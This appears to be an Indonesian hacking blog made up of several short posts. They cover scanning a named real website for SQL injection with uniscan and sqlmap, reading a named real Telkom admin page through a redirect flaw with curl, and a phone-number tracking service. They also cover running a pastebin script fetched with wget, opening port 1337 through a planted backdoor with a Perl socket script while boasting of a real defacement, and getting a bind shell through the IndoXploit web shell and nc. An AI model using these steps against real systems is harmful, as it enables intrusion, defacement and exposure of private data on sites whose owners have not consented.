Codes Xploit: website
Showing posts with label website. Show all posts
Showing posts with label website. Show all posts

Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux

 
ANONIMCYBER | Haloo sobat apa kabar! disini saya akan membahas langkah langkah Cara Mudah Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux pastinya sobat hacking atau cracking butuh mencari kelemahan suatu website kan? tenang saja saya akan membahasnya. simaklah pembahasan langkah langkah berikut yah sob.


Uniscan adalah scanner kerentanan untuk aplikasi web yang ditulis dalam bahasa pemrograman perlu dengan uniscan kita bisa mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi.uniscan ini sudah tersedia di kali linux, jadi kita tidak perlu install lagi sob.

Oke Sob, Kita Lanjut langsung saja ke langkah-langkahnya

Cara Muda Mencari Celah Kelemahan Website Dengan Uniscan Di Kali Linux :
1. Buka terminal anda dan ketikan perintah

uniscan -h yaitu untuk melihat option yang ingin kita gunakan




2. Memulai scaning dengan perintah & tunggu scaning hingga selesai

uniscan -u www.target.com -qweds

CONTOH :

uniscan -u www.melbournefineart.com.au -qweds


3. Wow kita bisa lihat disini ternyata website tersebut vuln terhadap sql injection


Dan bisa kita tusbol menggunakan sqlmap pada kali linux


Scaning telah selesai


Sekian langkah langkah ini, gimana sob cukup mudahkan? Nah saya ingatkan nih untuk sobat, sobat harus ada tujuan tertentu jangan ada tujuan negative yahh. jika ada yang ditanyakan sobat bisa berkomentar dibawah. Trimkasih. 

Jangan lupa share yah dan sampai jumpa sob.

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

eMobileTracker.com - Trace Mobile Number - Mobile Number Tracker

 
Assalamualaikum. Haloooo, sudah lama tidak posting kembali, maaf karena saya sendiri sudah sibuk oleh kegiatan dunia nyata :v. Oke langsung saja, ke inti dari artikel ini.

Melacak nomor telpon? Ingin cari tau siapa orang dibalik nomor asing yang iseng ke nomor telpon kita? Yap, mungkin ini akan sedikit membantu buat anda!!


eMobileTracker.com adalah layanan yang dirancang khusus untuk Anda untuk Melacak Nomor Ponsel, Foto dan Lokasi Orang di seluruh dunia tanpa pendaftaran atau pendaftaran apapun. Kami menyediakan kemampuan untuk melacak jumlah ponsel di lebih dari 230 negara di seluruh dunia.

Dari deskripsi yang diberikan diatas oleh pihak eMobileTracker.com jelas bahwa penggunaan layanan ini sangat mudah sekali, kita hanya perlu mengunjungi halaman website tersebut lalu langsung saja memilih menu Track Mobile Number .

Pada Halaman ini anda cukup memilih kode negara dan juga isikan nomor telpon yang ingin kita trace.


Mungkin jika kalian memang orang yang sangat sulit percaya akan layanan gratis di internet pada awalnya pasti kalian tidak akan benar percaya apakah layanan ini akan berfungsi atau hanya sekedar trap belaka, atau mungkin fatalnya bisa saja ada malware pada layanan ini.

Yap benar, awalnya saya pun tidak akan percaya apakah ini berhasil atau tidak, namun karena penasaran saja, saya coba memasukan nomor telpon saya lalu saya coba Track Now dan hasilnya adalah sebagai berikut.



Wuutt? Bagaimana dia bisa tau nama dari Nomor telponnya?

Saya sendiri baru saja menggunakan layanan ini, masih belum dapat penjelasan bagaimana layanan ini bisa mengetahui nama/pemilik dari nomor telpon yang awal tadi kita input kan. Yang jelas setelah kita input nomor, data nomor telpon kita akan masuk kedalam log mereka seperti gambar awal diatas.

Sayangnya, layanan ini tidak secara akurat memberikan informasi dimana lokasi (kota/provinsi) dari pemilik nomor telpon, layanan ini hanya dapat memberikan informasi dari Negaranya saja. Namun yang jelas, cukup bagus juga untuk mengetahui orang orang yang iseng. Silakan mencobanya sendiri :D

Ya, sekian dulu dari saya, baru ada waktu untuk buat artikel lagi, mungkin kalian bisa mendiskusikannya bagaimana layanan ini mengambil informasi nama anda dari nomor telpon.

Simple Tools for Website Information Gathering

 
Halo, kali ini saya akan membagikan sebuah tools sederhana yang digunakan untuk Information Gathering sebuah website. Tools ini akan otomatis mengambil informasi:

- IP Address
- Hostname
- NameServer & Mail Server
- Scan Range IP 1-255 dan deteksi Hostname dari tiap IP nya.


Tools ini dibuat dengan bahasa program BASH. Jadi jika kalian menggunakan OS Windows, installah bash terlebih dahulu, akan mudah jika kalian menggunakan Windows 10 yang sudah terintegrasi Bash Ubuntu. 





Cara menggunakan:
------------------------------------------
user@linux $ wget https://pastebin.com/raw/5njuKAZ1 -O file.sh
user@linux $ chmod +x file.sh
user@linux $ ./file.sh
------------------------------------------

Oke sekian dulu.




Tutorial Socket Server with Perl

 
Halo, selamat malam. Kali ini gua mau sharing lagi gimana socket server.
Masih inget gimana kemarin Meme Comic Indonesia (MCI) kena deface di PORT 1337?
Yap, gua pake metode ini.



Oke langsung aja.
Sebelumnya untuk melakukan socket server, kalian harus terlebih dahulu masuk ke dalam server target kalian lewat backdoor yang kalian pasang di salah satu website.


Disini saya menggunakan Script Perl yang saya dapat dari referensi google, lalu sedikit saya modifikasi agar koneksinya selalu open.

Script: https://pastebin.com/zk8v8jp6

Upload script socket perl diatas tadi ke backdoor kalian.
Setelah di upload, jalankan command berikut untuk menjalankan file perlnya.
$ perl perlcgi.pl
 [perlcgi.pl] adalah nama file kalian.

Metode ini akan membuka koneksi pada port yang sudah ditentukan.
 Setelah itu, lalu jalankan command berikut untuk memastikan.
$ ps aux | grep 'perl'

Saya menamai file perlnya dengan nama  'percgi.pl', maka akan menghasilkan seperti di gambar (perl [namafile].pl)

Setelah itu, coba kita buka [IP:PORT] pada browser kita untuk memastikan lagi. Apakah koneksinya berhasil?

PORT yang saya buka adalah port 1337.



Yap Berhasil!!!.

Sekarang, kita Reverse IP tersebut dan lihat ada berapa banyak domain dalam IP yang sama.

Disini saya menggunakan
www.yougetsignal.com/tools/web-sites-on-web-server/


Coba salah satu website yang muncul disana dan tambahkan port 1337, karena di script tersebut saya set port 1337.


Dan lainnya pun sama.
---------------------------------------------------
--------------------------------------------------------


Oke sekian dulu yoooooo ~

Tutorial Reverse Shell Dengan Bind Port

 
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..